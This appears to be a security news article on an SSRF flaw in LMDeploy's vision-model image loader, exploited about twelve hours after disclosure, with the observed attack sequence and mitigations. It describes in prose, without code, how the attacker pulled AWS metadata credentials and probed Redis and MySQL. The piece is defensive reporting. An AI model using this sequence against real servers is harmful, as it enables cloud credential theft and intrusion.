A high-severity SSRF in LMDeploy — the Shanghai AI Laboratory toolkit that compresses, deploys, and serves large language and vision-language models behind an OpenAI-compatible API — was exploited in the wild 12 hours and 31 minutes after the GitHub advisory went live, with no public proof-of-concept available. Cloud security firm Sysdig captured the entire eight-minute attack chain on a honeypot, including a successful AWS Instance Metadata Service (IMDS) credential pull. If you’re running an LMDeploy server on a GPU instance with an IAM role attached, assume hostile traffic is already probing it.

What happened

CVE-2026-33626 is a Server-Side Request Forgery vulnerability (CVSS 7.5) in the image-loading path used by LMDeploy’s vision-language model (VLM) endpoints. The function that loads an image referenced in an inference request accepts an arbitrary URL and fetches it server-side without validating hostnames, IP ranges, or URL schemes. That turns the model server into a generic HTTP request proxy reachable from the internet.

The advisory landed on GitHub on April 21, 2026. At 03:35 UTC on April 22, Sysdig’s honeypot logged the first exploitation attempt, originating from 103.116.72.119 (Prime Security Corp., Kowloon Bay, HK). Twelve hours and thirty-one minutes from advisory to first hit. There was no PoC published — the advisory text named the affected file, the vulnerable parameter, and the missing validation, and that was apparently enough.

The attack chain

Over an eight-minute session, the attacker walked the vision-language image loader through a textbook internal port scan:

  1. AWS Instance Metadata Service at 169.254.169.254 — pull IAM credentials attached to the GPU instance.
  2. Redis at 127.0.0.1:6379 — confirm open port, ready for cache poisoning or further pivoting.
  3. MySQL on localhost — port confirmed.
  4. A secondary HTTP administrative interface on the loopback.
  5. An out-of-band DNS exfiltration endpoint to confirm two-way reachability.

That sequence — IMDS first, then internal services — is the AWS SSRF playbook from a five-year-old training deck. What’s new is the target: VLM inference nodes typically run on GPU instances with broad IAM roles so they can pull model weights and training artifacts from S3. One successful IMDS fetch and the attacker has credentials with read access to your model bucket and, depending on your role policy, much more.

Affected versions and the fix

All LMDeploy versions prior to 0.12.3 are affected. The fix in 0.12.3 enforces hostname and IP-range validation in the image-loader path and rejects schemes other than http and https.

There is no workaround that doesn’t gut the VLM functionality. If you’re running a vulnerable version and can’t update right now, the only useful mitigations are external:

  • IMDSv2-only on every EC2 instance running an inference workload. IMDSv2 requires a session token from a PUT request with hop-limit 1, which an SSRF using a simple GET cannot satisfy. This single setting would have neutralized the IMDS leg of the observed attack chain.
  • Egress filtering on the inference subnet — block outbound to 169.254.169.254, RFC1918 ranges, and your own loopback from the application container.
  • Tight IAM roles. The model server needs s3:GetObject on a specific bucket prefix, not s3:* on *.
  • Network policies in Kubernetes that prevent pod-to-pod traffic from the inference deployment to anything other than its known dependencies.

Why this one matters

This isn’t notable because the bug is exotic — it’s a textbook SSRF in a function that takes a URL and fetches it. It’s notable because of what’s at the other end of the SSRF. The AI-infrastructure stack — inference servers, model gateways, agent orchestration tooling — is being deployed on the most permissive cloud configurations many organizations have ever stood up. GPU spend is high enough that operations teams skip the hardening pass to get capacity online; IAM roles are broad because nobody wants to be the person who broke a $40/hour training run with a missing permission.

The 12-hour exploitation window is not because LMDeploy is uniquely exposed. It’s because LLM serving infrastructure as a category is now a high-value target with low average hardening, and attackers are watching the GitHub advisory feeds for anything that lets them in.

What to do right now

Update LMDeploy to 0.12.3 or later. If you operate any LLM or VLM inference endpoint on a cloud VM, audit it for IMDSv2 enforcement and IAM-role scope today, regardless of what software is serving the model. Check Sysdig’s writeup for IOCs if you want to hunt for the observed exploitation pattern in your own logs — the 8-minute IMDS-then-Redis-then-MySQL signature is distinctive.

References